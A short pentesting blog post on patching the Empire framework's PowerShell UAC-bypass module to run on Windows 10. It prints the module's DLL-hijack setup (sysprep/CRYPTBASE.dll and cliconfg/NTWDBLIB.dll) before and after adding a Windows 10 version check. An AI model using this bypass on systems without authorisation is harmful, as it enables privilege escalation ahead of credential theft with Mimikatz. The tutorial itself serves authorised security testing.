Using Empire in Kali 2.0 to bypass UAC and invoke Mimikatz on Win10

UPDATE:

The guys on the Empire team have since added support for Windows 10, so this is no longer necessary.  🙂

 

So I was testing out Empire the other day on a Windows 10 box, but kept getting an error message when trying to bypass UAC on Windows 10:

unsupportedOS
[!] Unsupported OS!
So I took a look at the script that was running under /Empire/data/module_source/privesc/Invoke-BypassUAC.ps1 and found this:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})

if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
# windows 7/2008
$szElevDll = 'CRYPTBASE.dll'
$szElevDir = $env:WINDIR + "\System32\sysprep"
$szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
$szElevExeFull = "$szElevDir\sysprep.exe"
$szElevDllFull = "$szElevDir\$szElevDll"
$szTempDllPath = $TempPayloadPath
Write-Verbose "Windows 7/2008 detected"
}
elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") {
# windows 8/2012
$szElevDll = 'NTWDBLIB.dll'
$szElevDir = $env:WINDIR + "\System32"
$szElevDirSysWow64 = ''
$szElevExeFull = "$szElevDir\cliconfg.exe"
$szElevDllFull = "$szElevDir\$szElevDll"
$szTempDllPath = $TempPayloadPath
Write-Verbose "Windows 8/2012 detected"
}
else {
"[!] Unsupported OS!"
throw("Unsupported OS!")
}

 

There it is, that dreaded “Unsupported OS!” error.  It looks like its doing a version check, but not specifically including Windows 10.  So lets change that:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})

if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
# windows 7/2008
$szElevDll = 'CRYPTBASE.dll'
$szElevDir = $env:WINDIR + "\System32\sysprep"
$szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
$szElevExeFull = "$szElevDir\sysprep.exe"
$szElevDllFull = "$szElevDir\$szElevDll"
$szTempDllPath = $TempPayloadPath
Write-Verbose "Windows 7/2008 detected"
}
elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") -or ($OSVersion -eq "10.0")) {
# windows 8/2012/10
$szElevDll = 'NTWDBLIB.dll'
$szElevDir = $env:WINDIR + "\System32"
$szElevDirSysWow64 = ''
$szElevExeFull = "$szElevDir\cliconfg.exe"
$szElevDllFull = "$szElevDir\$szElevDll"
$szTempDllPath = $TempPayloadPath
Write-Verbose "Windows 8/2012 detected"
}
else {
"[!] Unsupported OS!"
throw("Unsupported OS!")
}


In the original code on line 555 it was looking specifically for Windows 8 or Server 2012.  In the modified version I added a check for Windows 10 as well.

Success!
Success!

After modifying and saving the code, I ran the command again, and this time it worked!

 

Here’s a video of me doing this start to finish.  As always, if you have any questions feel free to drop by #infoseclabs on freenode.